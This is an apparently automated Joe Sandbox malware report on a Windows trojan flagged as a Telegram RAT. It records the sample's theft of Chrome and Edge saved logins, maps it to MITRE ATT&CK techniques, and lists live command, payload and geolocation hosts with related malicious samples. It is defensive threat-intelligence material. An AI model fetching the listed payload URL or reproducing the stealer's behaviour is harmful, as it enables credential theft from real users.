            Source: C:\Users\user\Desktop\LE2dyDn347.exeCode function: 0_2_004033B5 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B5

            Stealing of Sensitive Information

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1080, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1080, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1080, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		2
            Obfuscated Files or Information            		1
            OS Credential Dumping            		4
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            Access Token Manipulation            		1
            Software Packing            		LSASS Memory14
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection            		1
            DLL Side-Loading            		Security Account Manager11
            Security Software Discovery            		SMB/Windows Admin Shares1
            Clipboard Data            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Masquerading            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
            Virtualization/Sandbox Evasion            		LSA Secrets31
            Virtualization/Sandbox Evasion            		SSHKeylogging23
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            LE2dyDn347.exe60%VirustotalBrowse
            LE2dyDn347.exe45%ReversingLabsWin32.Trojan.Leonem
            LE2dyDn347.exe100%AviraHEUR/AGEN.1338495

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://vernazzasuites.com0%Avira URL Cloudsafe
            https://go.SmbShare.cdxml=393270%Avira URL Cloudsafe
            http://mail.vernazzasuites.comd0%Avira URL Cloudsafe
            http://mail.vernazzasuites.com0%Avira URL Cloudsafe
            http://tylom.za.com/esto.bin0%Avira URL Cloudsafe
            https://go.S0%Avira URL Cloudsafe
            http://vernazzasuites.comd0%Avira URL Cloudsafe
            http://crl.m0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            vernazzasuites.com
            		185.153.221.224
            		truefalse
              		unknown
              tylom.za.com
              		172.93.120.241
              		truefalse
                		unknown
                reallyfreegeoip.org
                		104.21.64.1
                		truefalse
                  		high
                  checkip.dyndns.com
                  		193.122.130.0
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high
                      mail.vernazzasuites.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          http://tylom.za.com/esto.binfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1768696741.0000000005829000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://vernazzasuites.comdmsiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://mail.vernazzasuites.commsiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1765991197.0000000002A63000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.org/botmsiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1765991197.0000000002A63000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://reallyfreegeoip.orgdmsiexec.exe, 00000009.00000002.2501273805.00000000231BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000001.00000002.1768696741.0000000005829000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 00000001.00000002.1768696741.0000000005829000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://go.Spowershell.exe, 00000001.00000002.1765991197.0000000002A63000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://checkip.dyndns.orgmsiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2501273805.0000000023193000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://go.SmbShare.cdxml=39327powershell.exe, 00000001.00000002.1765991197.0000000002A63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://nsis.sf.net/NSIS_ErrorErrorLE2dyDn347.exefalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1765991197.0000000002A63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://vernazzasuites.commsiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://crl.mpowershell.exe, 00000001.00000002.1775288111.00000000081E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://nsis.sf.net/NSIS_ErrorLE2dyDn347.exefalse
                                                      		high
                                                      https://reallyfreegeoip.org/xml/8.46.123.189lmsiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.micropowershell.exe, 00000001.00000002.1770754226.0000000007010000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://checkip.dyndns.comdmsiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1766504188.00000000047C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1766504188.0000000004916000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/powershell.exe, 00000001.00000002.1768696741.0000000005829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1768696741.0000000005829000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://reallyfreegeoip.org/xml/8.46.123.189dmsiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://reallyfreegeoip.orgmsiexec.exe, 00000009.00000002.2501273805.00000000231BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://checkip.dyndns.orgdmsiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://reallyfreegeoip.orgmsiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://mail.vernazzasuites.comdmsiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://checkip.dyndns.commsiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://checkip.dyndns.org/dmsiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1766504188.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.2501273805.0000000023121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://reallyfreegeoip.org/xml/msiexec.exe, 00000009.00000002.2501273805.000000002319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    193.122.130.0
                                                                                    		checkip.dyndns.comUnited States
                                                                                    		31898ORACLE-BMC-31898USfalse
                                                                                    104.21.64.1
                                                                                    		reallyfreegeoip.orgUnited States
                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                    172.93.120.241
                                                                                    		tylom.za.comUnited States
                                                                                    		393960HOST4GEEKS-LLCUSfalse
                                                                                    185.153.221.224
                                                                                    		vernazzasuites.comTurkey
                                                                                    		49126AS49126TRfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                    Analysis ID:1631843
                                                                                    Start date and time:2025-03-07 16:31:57 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 6m 59s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:13
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:LE2dyDn347.exe
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:b7219044f45a1b030f5b784d35a92f1ee2d2343059fd7467115a5456fb2e5cba.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@6/17@4/4
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 33.3%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 96%
                                                                                    • Number of executed functions: 140
                                                                                    • Number of non-executed functions: 74
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 23.60.203.209
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                                                    • Execution Graph export aborted for target msiexec.exe, PID 1080 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7544 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    10:33:01API Interceptor38x Sleep call for process: powershell.exe modified
                                                                                    10:34:14API Interceptor130x Sleep call for process: msiexec.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    193.122.130.0UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Invoice & Packing List # SL1072401222.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    YKBGunlukEkstre.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Ziraat_Bankasi_Swift_Messaji.png.exeGet hashmaliciousMSIL Logger, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    March Shipment Documents.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    SecuriteInfo.com.Win32.PWSX-gen.12871.17752.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    CONTRACT.BAT.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    MEDUCK217841.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    z10JQP9VEXkuSZ7SOT.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Order 32389.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    104.21.64.1Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exeGet hashmaliciousLokibotBrowse
                                                                                    • touxzw.ir/fix/five/fre.php
                                                                                    Payment.exeGet hashmaliciousLokibotBrowse
                                                                                    • touxzw.ir/sccc/five/fre.php
                                                                                    7RryusxiMtHBz80.exeGet hashmaliciousLokibotBrowse
                                                                                    • touxzw.ir/sss2/five/fre.php
                                                                                    Request for quotation -6001845515-XLSX.exeGet hashmaliciousLokibotBrowse
                                                                                    • touxzw.ir/tking3/five/fre.php
                                                                                    vsf098633534.exeGet hashmaliciousLokibotBrowse
                                                                                    • touxzw.ir/sccc/five/fre.php
                                                                                    laser.ps1Get hashmaliciousFormBookBrowse
                                                                                    • www.lucynoel6465.shop/jgkl/
                                                                                    UPDATED SOA.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.shlomi.app/t3l4/
                                                                                    QUOTE OF DRY DOCK REPAIR.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.arryongro-nambe.live/ljgq/
                                                                                    QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.askvtwv8.top/2875/
                                                                                    Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.lucynoel6465.shop/hbfq/

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    reallyfreegeoip.orguPDwUy9ewY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    qUG1ZROxLJ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    jVE64QGXtK.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.16.1
                                                                                    mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    HT4YGXBRtx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.16.1
                                                                                    4LJHFzA8jr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.16.1
                                                                                    nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    checkip.dyndns.comuPDwUy9ewY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    qUG1ZROxLJ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    jVE64QGXtK.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    TR3lYZyOE3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    HT4YGXBRtx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 193.122.130.0
                                                                                    4LJHFzA8jr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    AS49126TRKontrakt-pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 185.153.221.224
                                                                                    firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                    • 185.216.112.238
                                                                                    942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejec, SalityBrowse
                                                                                    • 94.138.197.70
                                                                                    Payment confirmation.vbsGet hashmaliciousAgentTesla, XWormBrowse
                                                                                    • 185.48.180.81
                                                                                    j2IGByK7Bt.elfGet hashmaliciousMiraiBrowse
                                                                                    • 185.48.180.144
                                                                                    https://www.zorlu.com.tr/akillihayat2030/?utm_source=Zorlu&utm_medium=Anasayfa-Header-Buton&utm_campaign=Akilli-Hayat-2030Get hashmaliciousPhisherBrowse
                                                                                    • 94.138.196.4
                                                                                    http://acikdenizv2-bonus.buzz/TR/Get hashmaliciousUnknownBrowse
                                                                                    • 185.216.115.53
                                                                                    0RdfqK5MbK.elfGet hashmaliciousUnknownBrowse
                                                                                    • 94.138.212.165
                                                                                    respondintegrate.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.48.181.88
                                                                                    respondintegrate.exeGet hashmaliciousUnknownBrowse
                                                                                    • 185.48.181.88
                                                                                    ORACLE-BMC-31898USOeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    jVE64QGXtK.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    TR3lYZyOE3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 193.122.130.0
                                                                                    rjRYMApdf9.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    8JVG9KELay.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    nabarm7.elfGet hashmaliciousUnknownBrowse
                                                                                    • 129.147.157.74
                                                                                    HBL NO C-ACC-250002.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    Shipping Document ..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    HOST4GEEKS-LLCUSCONTRACT.BAT.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 172.93.120.241
                                                                                    https://arohx.cfd/mweb/mm2Get hashmaliciousUnknownBrowse
                                                                                    • 172.93.120.241
                                                                                    https://e888svhbb.cc.rs6.net/tn.jsp?f=001kuAvp5TZb__Hkifiw1Dunrq7wGEuQ1ioGKofiYBXVujoaWV9xYRWR1NK5wV0yrjXHozkOiJoFy-_-xeRfbezti7UsyxwA2dObzWg4IuOexzrl4iTD1i4Fe_lvIih5NV4OF4opUEjifUAoUGrwVf0CNMgWAbr-5BdIzJNJgud80U=&c=T1nFM6kA2ta7fejIlZLSkDMPoVolrtIWpCZM5m5CVpkkIsemh9-qEQ==Get hashmaliciousUnknownBrowse
                                                                                    • 185.221.216.102
                                                                                    https://docs.google.com/presentation/d/e/2PACX-1vQDFvWzUegFF27kLm5XiMxmiI_vw0w_W8F17ZhKqfyGz6sZuahycGusFvtZx15hlyXa4-uozDAa4BDT/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 185.221.216.102
                                                                                    audio.mp3_Junklessfoods.htmlGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                                    • 185.221.216.134
                                                                                    call_playback_Alphausa.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 172.93.121.126
                                                                                    https://docs.google.com/presentation/d/e/2PACX-1vS-nN7hyacCYt95zNulla0L9qX2DSAc5P5i0gxMOo_AM5wUPw1qtPfPGfFm-j95A08CW22rEIA_1zoH/pub?start=false&loop=false&delayms=1000Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 172.93.120.103
                                                                                    EXTERNAL FW Complete Settlement Agreement Approved Monday February 24 2025.msgGet hashmaliciousGabagool, HTMLPhisherBrowse
                                                                                    • 172.93.120.103
                                                                                    https://zetlandagencies.com/i/acct_rX9zK3qL7nJ2mP5t/live_eF6hG8wS1dB4vN2c/index.html?auth_nefGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 185.221.216.102
                                                                                    https://mailstiami.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                    • 185.221.216.128
                                                                                    CLOUDFLARENETUSxtQdwMwu86.exeGet hashmaliciousFormBookBrowse
                                                                                    • 172.67.180.97
                                                                                    A2h6QhZIKx.exeGet hashmaliciousAzorultBrowse
                                                                                    • 104.21.96.1
                                                                                    #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 172.67.189.153
                                                                                    #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    • 104.21.89.159
                                                                                    uPDwUy9ewY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    lightijak2.1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 104.21.45.166
                                                                                    qUG1ZROxLJ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    Checkpoint_News.htmlGet hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    54328bd36c14bd82ddaa0c04b25ed9aduPDwUy9ewY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    qUG1ZROxLJ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.64.1
                                                                                    OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    jVE64QGXtK.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.64.1
                                                                                    mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    HT4YGXBRtx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                    • 104.21.64.1
                                                                                    4LJHFzA8jr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:modified
                                                                                    Size (bytes):53158
                                                                                    Entropy (8bit):5.062687652912555
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                    MD5:5D430F1344CE89737902AEC47C61C930
                                                                                    SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                    SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                    SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
